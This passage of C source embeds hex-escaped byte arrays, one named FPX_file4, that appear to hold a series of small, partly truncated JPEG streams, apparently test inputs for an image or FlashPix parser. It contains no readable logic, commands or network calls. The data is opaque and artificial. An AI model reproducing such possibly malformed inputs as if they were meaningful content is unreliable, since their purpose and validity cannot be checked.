+"\x99\x59\xb7\xb1\x05\x46\x3e\x5c\xf0\x3e\xb8\xa1\xec\x0b\x70\xa2" +"\x8a\x2a\x4b\x0a\x28\xa2\x80\x0a\x28\xa5\x51\x96\x00\x77\xa0\x0b" +"\xb5\x47\x63\xa3\x38\x92\x4f\x30\x97\x62\x0e\x31\x80\x4f\x03\xf0" +"\x1c\x55\xea\xa2\x23\x31\x33\xa9\x76\x7c\xbb\x36\x58\xf2\x32\x73" +"\x8f\xa0\xe9\x54\xf6\x21\x6e\x14\x51\x45\x49\x61\x45\x14\x50\x01" +"\x4e\xb5\x48\x2e\x96\x2b\xa5\xf9\xf6\x96\xf2\xdb\x91\x8e\xa0\xf1" +"\xf9\xd3\x54\x48\x6e\x23\x55\x8b\x74\x67\x3b\xdf\x76\x36\xf1\xc7" +"\x1d\xf3\x57\xaa\x91\x0f\x50\xaa\x02\x24\x85\xa4\x58\xc9\x21\x9d" +"\x9c\xe5\xb3\xc9\x39\x35\x7e\xa8\x2a\xc2\xad\x20\x83\x6e\xd3\x23" +"\x13\xb4\xe7\xe6\xcf\xcd\xfa\xe6\x87\xb0\x2d\xc5\xa2\x8a\x2a\x4b" +"\x0a\x55\x05\x98\x01\xde\x92\x9d\x6d\x1d\xbd\xc3\xad\xca\x91\x23" +"\xc4\x59\x01\x04\xfc\xa7\xa3\x0c\x7a\xf1\x4d\x21\x37\x62\x7b\x68" +"\xe4\x8a\xdd\x52\x59\x7c\xd7\x1d\x5f\x68\x5c\xfe\x02\xa5\xa2\x8a" +"\x64\x85\x67\xa3\x42\xc6\x43\x6f\xb7\x6f\x98\xc0\xed\x18\xf9\xb3" +"\xf3\x7e\x39\xcd\x68\x55\x01\x2a\x4c\xd2\x34\x60\x80\xae\xc8\x72" +"\xb8\xe4\x1c\x1f\xff\x00\x5d\x0f\x60\x5b\x8b\x45\x14\x54\x96\x15" 
+"\x3d\x9c\xb1\xcb\x06\x62\x04\x05\x66\x53\x95\xc7\x20\xe0\xfe\xb5" +"\x05\x58\xb4\x97\xcd\x87\x3e\x5b\xa6\x18\xae\x18\x63\x38\x38\xcf" +"\xd0\xd3\x44\xb2\x6a\x28\xa6\xb3\x2a\x90\x19\x80\x2c\x70\x32\x7a" +"\x9a\x62\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" +"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" +"\x11\x00\x3f\x00\xf4\x70\x24\x32\xc6\x12\x2d\xe8\x5b\x0e\xdb\xb1" +"\xb4\x63\xaf\xbf\xa5\x5e\xa8\x6d\x62\x92\x18\x02\x4b\x2f\x9a\xf9" +"\x24\xb6\xdd\xbd\xf8\x18\xf6\x1c\x54\xd4\x06\xe1\x4d\x93\x7f\x96" +"\xde\x56\xdd\xf8\x3b\x77\x74\xcf\x6c\xd3\xaa\x85\xab\xcf\x73\xa9" +"\x4f\x33\x17\x8e\xda\x1c\xc3\x1a\x1e\x37\xb7\xf1\x31\xf6\xec\x3f" +"\x1f\x5a\x69\x09\xbe\x84\xba\x6d\x98\xb1\xb2\x48\x4b\x99\x24\xc9" +"\x69\x24\x3d\x5d\xcf\x2c\x7f\x3a\xb5\x45\x14\x37\x77\x76\x09\x59" +"\x59\x05\x53\xd6\x7f\xe4\x09\x7d\xff\x00\x5e\xf2\x7f\xe8\x26\xae" +"\x55\x3d\x67\xfe\x40\x97\xdf\xf5\xef\x27\xfe\x82\x69\xc7\xe2\x42" +"\x97\xc2\xcb\x94\x51\x48\xcc\xa8\xa5\x98\x85\x50\x32\x49\x38\x00" +"\x54\x94\x56\xbb\xbc\xfb\x3c\xf6\xd0\x24\x7e\x64\xb7\x0f\x80\xb9" +"\xc6\x14\x72\xcc\x7d\x80\xfd\x48\x1d\xea\xd5\x57\x8a\x1b\x79\x2e" +"\x05\xf4\x78\x77\x92\x30\xaa\xe0\xe4\x6d\xeb\xc7\xd7\x3f\xca\xac" +"\x53\x76\x12\xb8\x51\x45\x14\x86\x15\x4f\x59\xff\x00\x90\x25\xf7" +"\xfd\x7b\xc9\xff\x00\xa0\x9a\xb9\x54\xf5\x9f\xf9\x02\x5f\x7f\xd7" +"\xbc\x9f\xfa\x09\xaa\x8f\xc4\x89\x97\xc2\xcb\x95\x4f\x53\xb5\x92" +"\xfa\x04\xb6\x0c\x16\x17\x71\xe7\xfa\xb2\x77\x51\xf5\xe0\x1f\x6c" +"\xd4\xf7\x57\x11\xda\xda\xc9\x71\x2e\x76\x46\xa5\x8e\x06\x49\xf6" +"\x1e\xf5\x16\x9a\x2e\x7e\xc6\xaf\x7a\xdf\xbf\x90\x97\x65\xec\x99" +"\xe8\xa3\xe8\x38\xa1\x5d\x7b\xc0\xec\xfd\xd2\xc8\x00\x00\x00\xc0" +"\x1d\xa9\x68\xa2\xa4\xa0\xa2\x8a\x28\x00\xaa\x7a\xcf\xfc\x81\x2f" +"\xbf\xeb\xde\x4f\xfd\x04\xd5\xca\xa7\xac\xff\x00\xc8\x12\xfb\xfe" 
+"\xbd\xe4\xff\x00\xd0\x4d\x54\x7e\x24\x4c\xbe\x16\x3e\x1b\xc5\x9e" +"\xfa\x7b\x68\xd0\x91\x00\x50\xf2\x76\xdc\x79\xdb\xf5\x03\x07\xf1" +"\x15\x66\xa0\xb3\xb5\x8e\xce\x0f\x2a\x2d\xc4\x16\x2e\xcc\xc7\x25" +"\x89\x39\x24\x9a\x9e\x93\xb5\xf4\x1a\xbd\xb5\x0a\x28\xa2\x90\xc2" +"\x8a\x40\x41\x19\x07\x20\xd2\xd0\x01\x55\x75\x48\xde\x6d\x2a\xee" +"\x28\x97\x73\xbc\x2e\xaa\x3d\x49\x53\x8a\xb5\x45\x34\xec\xee\x26" +"\xae\xac\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" +"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" +"\x11\x00\x3f\x00\xf4\x2f\x0d\x7f\xc8\xb7\xa7\xff\x00\xd7\x05\xfe" +"\x55\xa7\x59\x9e\x1a\xff\x00\x91\x6f\x4f\xff\x00\xae\x0b\xfc\xab" +"\x4e\xae\xa7\xc4\xc8\xa7\xf0\x20\xa8\x2f\x2d\xa3\xbc\xb4\x92\xde" +"\x5c\xec\x90\x63\x23\xa8\xf4\x23\xdc\x1e\x6a\x7a\x2a\x13\xb1\x6d" +"\x5f\x41\x90\xab\xa4\x28\x92\x3f\x98\xea\xa0\x33\xe3\x1b\x8f\xae" +"\x29\xf5\x42\xf2\x39\xa1\xd4\x20\xbc\x81\x5e\x40\x71\x0c\xd1\x83" +"\xfc\x24\xf0\xc0\x7a\x83\xfa\x13\xe9\x57\xe9\xb5\xd4\x49\xf4\x19" +"\x2c\x69\x34\x6d\x1c\xa8\xae\x8c\x30\xca\xc3\x20\x8a\xa3\x75\x1a" +"\xcc\xf2\x5a\x95\x9d\x57\x00\xee\x5f\x94\x30\xfe\xe8\x6f\xc3\x9e" +"\xbf\x08\x51\xb0\x08\x04\xe0\xe4\x8e\x4e\x2b\x4a\x99\x34\x31\xce" +"\x9b\x25\x40\xeb\x9c\xe0\xd2\x8c\x14\x5d\xca\x9c\xdc\xa3\x63\x1a" +"\x3d\x54\x6a\x93\xc1\x0c\x56\xb2\xc5\xe5\xca\xac\xcd\x26\x00\xc0" +"\xfc\x79\xad\xf8\xa3\xf3\x1f\xe6\x1f\x28\xea\x08\xeb\x55\x63\xb1" +"\xb5\x13\x2f\x97\x04\x62\x4e\xa3\xfc\x6b\x4d\x14\x22\x05\x5e\x82" +"\xb6\x93\x4f\xe1\x47\x3c\x54\x97\xc4\xc6\xcf\x27\x95\x19\x60\xa5" +"\x8f\x40\xa3\xb9\xa8\xae\x23\x58\xec\x2e\x02\x8c\x65\x18\x9f\xae" +"\x2a\x44\xdc\xf3\x17\x0e\x0c\x40\x6d\x00\x7a\xe7\x9c\xd2\x5e\xff" +"\x00\xc7\x8c\xff\x00\xf5\xcd\xbf\x95\x0b\x70\x7b\x0d\xba\xfe\x0f" +"\xbd\xdf\xa7\x4a\x86\xa6\xba\xfe\x0e\x3d\x79\xcd\x43\x50\xcd\x10" 
+"\x51\x45\x49\x02\x6f\x7d\xc7\xee\xaf\x62\x3b\xd2\x06\xc9\x2d\xd0" +"\xaa\x6e\x60\xc0\xb7\x25\x4e\x38\xf6\xe2\x96\x69\x02\x94\x4c\x31" +"\x32\x1c\x0c\x76\xf7\xa9\x09\x00\x64\xf0\x2a\x38\x84\x85\x9d\x9d" +"\x81\x52\x7e\x40\x3b\x0a\xb2\x18\xe8\xa3\x58\xa2\x58\xe3\x18\x55" +"\x18\x02\x99\x7b\xff\x00\x1e\x33\xff\x00\xd7\x36\xfe\x55\x35\x43" +"\x7b\xff\x00\x1e\x33\xff\x00\xd7\x36\xfe\x54\x2d\xc1\xec\x36\xeb" +"\x19\x4e\x07\x7f\xad\x43\x53\x5d\x11\xb9\x06\x46\x79\xe3\xbd\x43" +"\x52\xca\x42\xa8\x2c\xe1\x46\x32\x7d\x4f\x6a\xb6\xaa\x15\x42\x8e" +"\x82\xab\x41\xfe\xbc\x0c\x8e\x87\x8c\x55\xa2\x40\xeb\x4d\x03\x21" +"\x98\xa4\xaf\xf6\x66\x0c\x77\x2e\x5b\x1d\x85\x4c\x00\x03\x03\x80" +"\x2a\x38\x04\x9e\x58\x33\x63\x79\xe4\x81\xdb\xda\xa5\xa6\xc9\x5d" +"\xc2\xa1\xbd\xff\x00\x8f\x19\xff\x00\xeb\x9b\x7f\x2a\x96\x9b\x2a" +"\x09\x62\x78\xd8\x90\x1d\x4a\x9c\x7b\xd0\x81\xec\x00\xff\xd9\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00" +"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" +"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xd7\x86" +"\xf5\xe4\x99\x51\xe1\xd8\x09\x2b\x9c\xe7\x91\xf8\x74\xad\x9d\x18" +"\xe3\x53\xce\x40\x3e\x53\x73\x8e\x7b\x53\x22\xd3\xee\x64\x82\x29" +"\xbf\x74\x04\xaa\x0a\xe5\xfa\xe7\xb7\x4a\xd0\xd3\x74\xc9\xed\xae" +"\x1e\x79\x98\x0c\x21\x50\xa8\x73\x9f\x7a\xf1\x70\xd8\x5a\xb0\xac" +"\xa4\xe3\x64\x8f\x42\xb5\x78\x4a\x9b\x49\xdc\xb4\x39\x03\xbd\x15" +"\xfc\xd6\x8d\x47\x70\xae\xf6\xee\x22\xdb\xe6\x6d\x3b\x37\xf4\xcf" +"\x6c\xd2\x02\x87\x86\xbf\xe4\x5b\xd3\xff\x00\xeb\x82\xff\x00\x2a" +"\xd3\xac\xcf\x0d\x7f\xc8\xb7\xa7\xff\x00\xd7\x05\xfe\x55\xa7\x57" +"\x53\xe2\x64\xd3\xf8\x10\x51\x45\x15\x05\x85\x53\xb5\xbb\x69\x2f" +"\x6e\x6d\x27\x55\x49\x62\x21\x93\x1d\x1e\x33\xd1\xbf\x3c\x83\xf4" +"\xf7\xab\x95\x0c\xb1\xc2\xb2\x0b\xa7\x41\xbe\x24\x60\x1f\x19\x21" +"\x4e\x09\x1f\xa0\xa6\xac\x27\x72\x6a\x29\x90\xcb\x1c\xf0\xa4\xd0" 
+"\xb0\x78\xdd\x43\x2b\x0e\x84\x1a\x7d\x21\x99\x9e\x1a\xff\x00\x91" +"\x6f\x4f\xff\x00\xae\x0b\xfc\xab\x4e\xb3\x3c\x35\xff\x00\x22\xde" +"\x9f\xff\x00\x5c\x17\xf9\x56\x9d\x5d\x4f\x89\x91\x4f\xe0\x41\x45" +"\x14\x54\x16\x14\x51\x45\x00\x54\xd3\xec\xcd\x90\x9a\x25\x70\x60" +"\x69\x0b\xc4\x98\xfb\x80\xf2\x57\xe9\x9c\x91\xf5\xab\x75\x5b\x50" +"\x86\x69\xad\x18\x5a\xca\x63\x9d\x48\x78\xce\x70\x09\x1c\xe0\xfb" +"\x1e\x87\xeb\x4e\xb3\xb8\xfb\x55\xa4\x53\xf9\x6f\x19\x75\xc9\x47" +"\x18\x2a\x7b\x83\x54\xf5\xd4\x95\x65\xee\x95\xf4\x18\x64\xb7\xd0" +"\xac\xa1\x9d\x0a\x48\x90\xaa\xb2\x9e\xa0\xe2\xaf\xd1\x49\x91\x90" +"\x32\x32\x7a\x0a\x4d\xdd\xdc\x71\x56\x56\x16\x8a\x28\xa4\x30\xa2" +"\x8a\x28\x00\xaa\xb3\xdd\x34\x17\xb6\xf0\xb4\x44\xc5\x3e\xe5\xf3" +"\x07\xf0\xb8\x19\x00\x8f\x71\x9e\x7d\xbd\xea\xd5\x14\xd0\x98\xff" +"\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff" +"\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03" +"\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00" +"\xe9\xec\xe7\x9e\x13\x01\x8e\x62\xc2\x47\x55\x58\x23\x5f\x92\x33" +"\x9c\x34\x64\x63\xe5\x20\x64\x86\x3d\x70\x73\x5d\x05\x43\x72\xcb" +"\x65\x6f\x35\xd3\xc4\xbe\x62\xa6\xe7\xda\x39\x6c\x0e\x99\xa8\x56" +"\x5b\xb8\x67\x85\x2e\xcc\x2e\xb3\x9d\xa3\xca\x52\xbb\x1b\x04\xe3" +"\x92\x72\x38\x3c\xf1\x57\x27\xcf\xa9\x10\x5c\x9a\x32\xe5\x14\x51" +"\x59\x1b\x05\x14\x51\x40\x05\x14\x55\x2b\xfb\xc4\x58\x64\x8e\x0b" +"\x85\x12\xa1\x5f\x37\x61\x05\xe3\x42\x46\xe6\xc7\xb0\xa6\x93\x6e" +"\xc8\x99\x49\x45\x5d\x9a\x37\x36\xe8\x5d\xee\x1e\x46\xda\x23\x2a" +"\xc8\xc7\xe4\xc7\x5c\xe3\xd6\xb2\xa6\xb7\x0b\x6a\x50\x5e\x7d\x9b" +"\x4f\x0b\xb8\xba\xc9\xf3\x10\x7b\x06\x3f\x75\x7a\x74\xfd\x2b\x78" +"\xf2\x30\x6a\x85\xdc\x08\x59\x6d\xd6\x16\x48\xf6\x65\x1d\x54\x6d" +"\x8c\x8e\x98\xf4\x3c\xf1\xc5\x5a\x76\x21\xab\x95\x74\xdb\x9f\x36" +"\x33\x14\x92\x66\x55\xcb\x28\x61\xb5\xcc\x79\xc2\xb1\x5e\xd9\xab" 
+"\x95\x8d\xb1\x1a\xf1\x2d\xf4\xf4\x58\xae\x22\x32\x3c\x8f\x22\xee" +"\x62\xc3\x00\x16\x63\xce\x1b\x27\x9e\xb5\xb2\x7f\x2c\xf4\xa5\x34" +"\x93\xba\x0a\x6d\xb5\x66\x14\x51\x54\x2e\xb5\x03\x05\xd9\x8d\x43" +"\x49\x18\x5f\xde\xb2\x46\x4f\x90\x7a\x86\x27\xa6\x3d\xba\x8e\xb5" +"\x2a\x2e\x5b\x17\x29\x28\xab\xb1\xda\x95\xd9\x82\x10\x21\x7c\x1d" +"\xea\x24\x75\xc3\x18\x54\x9e\x58\x8f\xf3\x8a\x8a\x2b\x16\x29\xf6" +"\x79\x8b\x3e\xc6\x33\x43\x77\x1e\x15\x81\x27\x3c\xfb\xf3\xf4\x22" +"\xa0\xb4\xb7\xdf\x1d\x9a\xad\x99\x49\xa2\x60\xcf\x73\xc6\xd7\x18" +"\xf9\x88\x6c\xe5\xb7\x7a\x7b\xf3\xd2\xb5\xed\xd2\x14\x75\xb4\x87" +"\x62\x6c\x5c\x88\xc1\xfb\xab\x9f\x4f\x4a\xd1\xfb\xaa\xc8\xc9\x7b" +"\xee\xec\xd0\xa4\x61\x95\x23\xd6\x96\x8a\x83\x43\x2e\x58\x6e\x92" +"\x38\xdd\x88\x7b\x84\x52\x36\x2b\x15\x89\xc9\xee\x7f\x9d\x65\x42" +"\x86\x7d\x41\x2e\xfc\x89\x2f\x54\x1c\x34\xe7\x0a\xaa\x41\xe0\xc4" +"\xa7\x9c\x0e\xe7\xb8\xf5\xae\x86\xea\x28\xcb\x24\xf2\x48\xc9\xe5" +"\x03\x8f\x9b\x0a\x73\xeb\xeb\xda\xa1\xaa\x52\xe5\x25\xc3\x98\x2a" +"\x93\xdb\x5d\x24\xb3\xfd\x96\x58\x84\x73\x9d\xcd\xe6\x29\x25\x0e" +"\x00\x24\x63\xaf\x4e\x86\xae\xd0\x08\xc8\x0c\xc1\x72\x40\x04\x9c" +"\x73\x50\x9b\x45\xc9\x27\xb9\x04\x56\xe6\xd2\xc9\x20\xb1\xb7\xde" +"\x23\x01\x55\x37\x05\xe3\x3c\x9c\xfe\x66\xb4\x92\x34\x43\xb9\x54" +"\x06\xc6\x0b\x63\x92\x29\x96\xd0\x18\x23\x2a\x65\x79\x49\x62\xdb" +"\x9f\xb6\x4f\x41\xec\x2a\x6a\xa2\x50\x51\x45\x14\x86\x57\xbe\xfb" +"\x39\xb4\x7f\xb5\xec\xf2\xb8\xce\xfe\x99\xcf\x1f\xae\x2a\x23\xd6" +"\xa6\xbd\x92\x28\xad\x5d\xee\x00\x31\xf0\x0e\x57\x77\x24\xe0\x71" +"\xf5\xc5\x42\x7a\xd0\xc6\xb7\x12\x9a\xed\x02\xb4\x7f\x68\xdb\xb4" +"\xc8\xa1\x77\x0f\xe2\xcf\xcb\xf8\xe7\x14\xea\x46\x92\x38\x9a\x36" +"\x94\x12\x0b\xaa\x8f\x97\x3c\x93\x81\xfa\xf7\xa4\xb7\x07\xb1\x7e" +"\x8a\x28\xa6\x20\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x0b\x5c\xc6\x8e\x11\xc9\x07\x81\x92\x3b\xfa\x7d\x6a\x6a\xf6\x6c" 
+"\x70\xa7\x70\xac\xb8\xf5\x2b\xad\x8b\xe6\x5a\xe7\xfb\xc4\x13\xed" +"\xdb\x1e\xf5\xa9\x45\x20\x0a\x28\xa2\x81\x8b\xa7\xc6\xb2\x68\xf6" +"\x8a\xe0\x11\xe5\x21\xfc\x70\x2a\xcc\x32\x34\x91\xe5\xd0\xa3\x02" +"\x41\x06\xa1\xd2\xff\x00\xe4\x15\x69\xff\x00\x5c\x53\xf9\x0a\x92" +"\x4c\xc7\x28\x99\xa4\x0b\x18\x18\x60\x7a\x7b\x1a\xd2\x5b\xb3\x18" +"\xec\x8a\x1a\x8d\x9e\x1c\x49\x1a\x8d\xc3\xa7\x27\x27\x8a\x2d\x27" +"\xf3\x53\x6b\x70\xeb\xc1\xf7\xf7\xad\x37\x50\xe8\x54\x92\x33\xdc" +"\x56\x2d\xd4\x73\x5b\x5d\xf9\x91\xc6\xcd\xb8\x8c\xa8\x6c\x9c\x73" +"\xdb\xde\x8d\xd5\x87\xf0\xbb\x97\xa8\xa6\xc4\xe2\x48\x95\xc1\xce" +"\x47\x5c\x62\x9d\x59\x9a\x05\x14\x51\x40\xc9\x34\xbf\xf9\x05\x5a" +"\x7f\xd7\x14\xfe\x42\xac\x3a\x2c\x91\xb2\x38\x0c\xac\x08\x20\xf7" +"\x15\x5f\x4b\xff\x00\x90\x55\xa7\xfd\x71\x5f\xe4\x2a\xd5\x69\x2d" +"\xd9\x94\x7e\x14\x45\x13\x92\xcf\x19\x52\xa5\x0e\x06\x79\xc8\xf5" +"\xa6\xdc\xc2\x24\x8c\xf1\x9e\x39\x18\xe5\x87\xa5\x3a\x60\xf9\x47" +"\x47\x0a\x14\xe5\x81\xe8\x45\x48\x08\x60\x0a\x9c\x83\xd0\x8a\x43" +"\x31\xad\x97\xec\x5f\xba\x91\xdd\xf3\x8e\xdc\x2f\x6a\xb9\x49\x7f" +"\x6a\xac\xa5\x95\x47\x3e\xe7\x93\xfe\x15\x5e\xc6\x56\x31\x14\x93" +"\x07\x67\x1b\x87\x43\x43\xd7\x50\x8b\xb6\x85\x9a\x8e\x79\x92\x08" +"\x9a\x47\xe8\x06\x71\xdc\xd1\x3c\xc9\x02\x6f\x7e\x99\xc5\x54\x85" +"\x0d\xe4\xc6\x49\x71\xb0\xe0\x28\xc9\xfc\xa9\x25\xd5\x8e\x52\xb6" +"\x8b\x73\x4f\x4b\xff\x00\x90\x55\xa7\xfd\x71\x5f\xe4\x2a\xd5\x45" +"\x6f\x12\xdb\xdb\x47\x0a\x92\x56\x35\x0a\x09\xf6\xe2\xa5\xa6\xdd" +"\xd8\x92\xb2\x12\xa1\x84\xac\x52\x7d\x99\x54\xa8\x0b\xb9\x4f\x62" +"\x2a\x7a\x64\x8a\xcc\x06\xd6\xda\x41\x07\x38\xfd\x28\x06\x38\x8c" +"\x82\x2b\x2e\xe6\xc8\x34\xc3\xe7\x2a\xaa\x77\x63\x39\xcf\xbd\x6a" +"\xd5\x49\xc8\xf3\xc8\xca\xe7\x68\xe9\xd7\xbd\x2b\xd8\x76\xbe\xe4" +"\x32\xc4\xb2\x80\x18\x91\x8e\x84\x1c\x55\x9b\x68\x04\x68\x32\x31" +"\xc0\x01\x7f\xbb\x50\x31\x01\x72\x4a\x80\x3b\xb7\x4a\xbf\x42\x07" +"\xb8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff" +"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11" +"\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22" +"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11" +"\x03\x11\x00\x3f\x00\xed\xaf\xaf\x9a\x38\xf6\x61\xa2\x60\xc0\xcc" +"\x54\x82\xd1\x47\x9c\x6f\xf7\x1c\x75\xed\x4d\x1a\x74\x8d\x7c\x27" +"\xfb\x44\x84\x88\xf1\x1d\xca\x95\x2d\xb4\xff\x00\x09\x04\x10\x7d" +"\x98\x7f\xfa\xe1\x86\xde\x27\xd4\x55\x2c\xae\x0c\xd0\xa0\x32\x34" +"\x9e\x66\xe3\x13\x93\xd0\x1e\x84\x37\x39\x53\xc7\x7a\xd7\x86\x24" +"\x28\xd6\xd6\xac\x91\x79\x6b\x80\xab\x83\xe5\xe7\xa7\x15\xa3\x7c" +"\xba\x44\xc9\x2e\x67\x79\x0d\xb7\x84\x41\xe4\x5b\x43\x0b\x98\xb9" +"\x05\xc1\x1f\x2f\x7c\x9c\xf5\x24\xd5\xe8\xa1\x8e\x10\xc2\x28\xd5" +"\x37\x31\x66\xda\x31\x92\x7a\x93\xef\x4b\x0a\x18\xe1\x44\x2e\x5c" +"\xa8\x00\xb1\xea\xc7\xd6\x9f\x59\x9a\x05\x14\x53\x25\x96\x38\x62" +"\x79\x65\x70\x91\xa0\x2c\xcc\xc7\x00\x01\xde\x81\x91\xde\x5d\x45" +"\x65\x6c\xd7\x13\x92\x11\x7b\x01\x92\xc4\xf4\x00\x77\x24\xd3\x91" +"\x56\x41\x1c\xcf\x08\x59\x02\xf1\xb8\x02\xc9\x9c\x64\x67\xfc\xf4" +"\xa8\xda\xde\xde\xee\x5b\x7b\xb6\xcb\xf9\x63\x74\x59\x27\x03\x23" +"\xef\x63\xd7\x1f\x96\x4d\x59\xa7\xa1\x2a\xed\x99\xfb\x59\x3c\xb4" +; + +unsigned char FPX_file4[] = +"\x82\x0d\xc0\xb8\x0d\xb7\x0a\x10\x1e\xad\x57\x52\x28\xe3\x66\x64" +"\x45\x56\x6c\x6e\x20\x72\xdf\x5f\x5a\x6d\xb4\x26\x0b\x75\x8d\xa5" +"\x79\x58\x75\x77\xc6\x4f\xe5\x52\xd2\x28\x28\xa2\x8a\x00\x2a\x9d" +"\xdd\x92\xdf\x49\x01\x96\x4d\xd6\xf1\x9d\xe6\x20\x38\x91\xbf\x84" +"\x93\xdc\x0e\xb8\xf5\xc7\xa5\x37\x51\xb6\x9e\xf5\xa3\xb6\x0c\x23" +"\xb4\x6c\x99\xc8\x38\x67\x1f\xdc\x1e\x80\xf7\x3e\x9c\x77\xab\x8a" +"\xaa\x8a\x15\x00\x55\x51\x80\x07\x40\x2a\xb6\xd5\x13\xf1\x68\xc7" +"\x51\x45\x15\x25\x05\x14\x51\x40\x05\x50\xd4\x9a\xea\x56\x4b\x3b" +"\x30\xf1\x99\x41\x32\x5c\x01\xc4\x4b\xdf\x1f\xed\x1e\xdf\x9f\x6a" 
+"\x5d\x46\xf1\xe1\x64\xb5\xb3\x55\x92\xf2\x6f\xb8\xad\xd1\x07\x77" +"\x6f\x61\xfa\x9c\x0a\xba\xb9\x0a\x01\x39\x3d\xcd\x52\xf7\x75\x25" +"\xfb\xda\x08\x8b\xb1\x15\x72\x4e\x06\x32\x4e\x49\xa7\x51\x45\x49" +"\x41\x48\x48\x00\x92\x70\x07\x7a\x5a\xc3\xf1\x6d\xdc\x90\xe9\x42" +"\xd2\xdb\xfe\x3e\x6f\x9c\x5b\xc6\x3e\xbd\x4f\xe5\xfc\xea\xa1\x1e" +"\x69\x24\x4c\xe5\xcb\x16\xcd\xca\xab\x7f\x7a\xb6\x51\x29\xd8\x65" +"\x9a\x46\xd9\x14\x4b\xd5\xdb\xd3\xd8\x77\x27\xb0\xab\x55\x00\xb5" +"\x8b\xed\xa6\xed\x81\x69\x76\xec\x52\xdf\xc0\x3b\x81\xf5\xc5\x25" +"\x6e\xa3\x77\xb6\x84\xa0\x7f\x11\x50\x1b\x18\x34\xea\x28\xa4\x30" +"\xa2\x91\x59\x5b\x3b\x48\x38\x38\x38\x3d\x0d\x19\x00\x81\x9e\x4d" +"\x00\x2d\x73\xd6\xd1\xbe\xa7\xe3\x09\xee\xe4\x56\x16\xfa\x72\xf9" +"\x30\x86\x1c\x19\x08\xf9\x8f\xe5\xfd\x2b\xa1\xa4\xdc\x37\x6d\xc8" +"\xdd\x8c\xe3\xbd\x54\x65\xcb\x72\x25\x1e\x6b\x00\xff\xd9\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11" +"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff" +"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xa1" +"\xad\xea\x0b\xa5\xe9\x17\x17\x87\x1b\x91\x7e\x40\x7b\xb1\xe0\x0f" +"\xce\xaf\xd7\x39\xab\x7f\xc4\xdb\xc5\x16\x7a\x58\xe6\x0b\x41\xf6" +"\xab\x8f\x42\x7f\x85\x7f\xcf\x63\x5a\x53\x8a\x72\xd7\x63\x3a\x92" +"\x6a\x3a\x6e\xcb\xde\x1a\xd3\xdb\x4e\xd1\xa2\x49\x7f\xe3\xe2\x5f" +"\xde\xcc\x4f\x52\xed\xc9\xcf\xd3\xa7\xe1\x5a\xb4\x51\x53\x29\x39" +"\x3b\xb2\xa3\x15\x14\x92\x0a\x28\xa2\xa4\xa3\x9c\x8f\xfe\x25\x1e" +"\x33\x74\xfb\xb6\xda\xaa\xee\x5f\x41\x2a\xf5\xfc\xc7\xea\x6b\xa3" +"\xac\x6f\x15\xd9\x3d\xde\x8c\xd2\xdb\xf1\x73\x68\xc2\xe2\x12\x3a" +"\xe5\x79\xfe\x59\xfd\x2a\xfe\x97\x7a\x9a\x8e\x9b\x6f\x79\x1f\x02" +"\x54\x0d\x8f\x43\xdc\x7e\x06\xb5\x9f\xbd\x15\x2f\x91\x8c\x3d\xd9" +"\x38\xfc\xc9\x6e\xae\x23\xb5\xb5\x96\xe2\x53\x84\x89\x0b\xb1\xf6" +"\x02\xb1\xbc\x23\x6f\x23\x59\xcd\xaa\x5c\x8c\x5c\x6a\x12\x19\x4f" 
